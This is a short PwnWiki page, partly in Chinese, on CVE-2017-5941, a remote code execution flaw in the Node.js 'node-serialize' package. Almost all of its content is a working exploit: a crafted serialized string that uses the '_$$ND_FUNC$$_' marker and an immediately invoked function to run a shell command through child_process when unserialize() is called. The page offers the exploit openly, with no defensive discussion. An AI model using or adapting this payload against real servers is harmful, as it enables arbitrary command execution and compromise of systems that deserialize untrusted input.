CVE-2017-5941 Node.JS - 'node-serialize' 遠程代碼執行漏洞

From PwnWiki
Revision as of 09:26, 11 April 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> var serialize = require('node-serialize'); var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stde...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2017-5941_Node.JS_-_%27node-serialize%27_遠程代碼執行漏洞&oldid=1512"